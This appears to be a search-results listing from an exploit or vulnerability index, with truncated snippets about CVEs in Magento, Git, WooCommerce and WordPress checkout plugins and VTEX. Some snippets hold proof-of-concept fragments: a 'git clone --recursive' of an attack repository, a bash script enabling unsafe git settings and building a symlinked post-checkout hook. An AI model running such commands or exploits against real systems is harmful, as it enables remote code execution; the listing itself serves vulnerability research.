3058 matches found
CVE-2022-24086
CVE-2022-24086 CVE-2022-24086 POC example provided by BurpRoot CVE-2022-24086: Overview Affected Software: Magento2 CVE ID: CVE-2022-24086 CVSS Score: 9.8 Critical Description CVE-2022-24086 is a critical security vulnerability affecting multiple versions of the Magento2 e-commerce platform. This...
CVE-2024-32002
GIT RCE CVE-2024-32002 Description | CVE-2024-32002 | https://www.tarlogic.com/blog/cve-2024-32002-vulnerability-git/ | Exploit | First you need to create "calledrepo" "commandrepo" repos on git. | Victim will later call the calledrepo with "git clone --recursive calledrepo.git" that redirect to...
CVE-2026-96669
The Food Store โ Online Food Delivery & Pickup plugin for WordPress is vulnerable to Stored Cross-Site Scripting (XSS) in versions up to and including 1.5.5 . The root cause is insufficient input sanitization and output escaping related to the 'service_type' Cookie . Unauthenticated attackers can...
EUVD-2026-112586
The Food Store โ Online Food Delivery & Pickup plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'servicetype' Cookie in all versions up to, and including, 1.5.5 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to...
git_rce
CVE-2024-32002 PoC 1. You must set up the git's symbolic link option like: git config --global core.symlinks true 2. Then exploit CVE-2024-32002 by the following command: git clone --recursive https://github.com/EQSTSeminar/gitrce.git Attack Scenario kali192.168.216.129 --Give remote repository...
WooCommerce Swipe <= 2.7.1 - Cross-Site Scripting
A cross-site scripting vulnerability in test-plugin.php in the Swipe Checkout for WooCommerce plugin 2.7.1 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the apiurl parameter. id: CVE-2014-4558 info: name: WooCommerce Swipe = 2.7.1 - Cross-Site...
WooCommerce Checkout Field Manager < 18.0 - Arbitrary File Upload
The WooCommerce Checkout Field Manager WordPress plugin before 18.0 does not validate files to be uploaded, which could allow unauthenticated attackers to upload arbitrary files such as PHP on the server. id: CVE-2022-4328 info: name: WooCommerce Checkout Field Manager 18.0 - Arbitrary File Uploa...
Flexible Checkout Fields for WooCommerce <= 2.3.1 - Unauthenticated Arbitrary Plugin Settings Update
The Flexible Checkout Fields for WooCommerce plugin for WordPress is vulnerable to Unauthenticated Arbitrary Plugin Settings update, in addition to Stored Cross-Site Scripting in versions up to, and including, 2.3.1. This is due to missing authorization checks on the updateSettingsAction function...
CVE-2024-50968
CVE-2024-50968 Description A business logic vulnerability exists in the Add to Cart function of itsourcecode Agri-Trading Online Shopping System 1.0, which allows remote attackers to manipulate the quant parameter when adding a product to the cart. By setting the quantity value to -0, an attacker...
Vulnerability-Playground-CVE-2025-61922
Vulnerability-Playground-CVE-2025-61922 This playground simulates the Customer Checkout vulnerability in PrestaShop...
CVE-mitre
CVE-Mitre Common Vulnerability Exposure Download single CVE The variable is only for example ; you can make your own SVN script for downloading a single folder = CVE = BR @nu11secur1ty $CVE = CVE-2020-13935 svn checkout https://github.com/nu11secur1ty/CVE-mitre/trunk/$CVE Link table of Analysis...
CVE-2024-32002-poc
Bash Script: !/bin/bash Set Git configuration options git config --global protocol.file.allow always git config --global core.symlinks true Avoid warning messages set default branch to main git config --global init.defaultBranch main Define tell-tale path telltalepath="$PWD/tell.tale" Initialize...
CVE-2025-48384-submodule
CVE-2025-48384 Submodule This submodule contains a malicious post-checkout hook for demonstration...
CVE-2025-2266
๐จ CVE-2025-2266 โ WordPress Plugin Exploit ๐ Vulnerability Summary The Checkout Mestres do WP for WooCommerce plugin for WordPress is affected by an unauthenticated arbitrary options update vulnerability in versions 8.6.5 through 8.7.5. The vulnerable function cwmpUpdateOptions lacks proper...
CVE-2025-68001
CVE-2025-68001 WordPress g-FFL Checkout Plugin ๐ก Stay ahead of the curve. Join @KNxploited on Telegram โ your exclusive source for the latest CVEs, zero-days, and cutting-edge exploit research. Updated constantly. Not for everyone. ๐ Overview CVE-2025-68001 is a critical Unauthenticated Arbitrary...
CVE-2024-32002-Exploit
!/bin/bash git init hook cd hook mkdir -p y/hooks cat y/hooks/post-checkout dotgit.txt git hash-object -w --stdin dot-git.hash printf "120000 %s 0\ta\n" "$cat dot-git.hash" index.info git update-index --index-info index.info git commit -m "add-symlink" git remote add origin...
hook
This repository does not have a README...
CVE-2026-52217-VTEX-Checkout-CrossTenant-IDOR
CVE-2026-52217 Cross-tenant and cross-user authorization flaw IDOR / BOLA in the VTEX Commerce Platform Checkout service. Field| Value ---|--- CVE ID| CVE-2026-52217 Vendor| VTEX Product| VTEX Commerce Platform, Checkout service chk Affected| Observed on chk v2.367.3 and reproduced on v2.374.3. T...
CVE-2022-24086-RCE
CVE-2022-24086-RCE CVE-2022-24086 RCE Description Adobe Commerce versions 2.4.3-p1 and earlier and 2.3.7-p2 and earlier are affected by an improper input validation vulnerability during the checkout process. Exploitation of this issue does not require user interaction and could result in arbitrar...
CVE-2024-32002
CVE-2024-32002 A simple proof-of-concept that executes Calculator macOS example only. When using git clone --recursive command, this repo will also pull https://github.com/markuta/hooky, which contains a post-checkout script. Mostly based on the commit fix t7406-submodule-update.sh file. Run Note...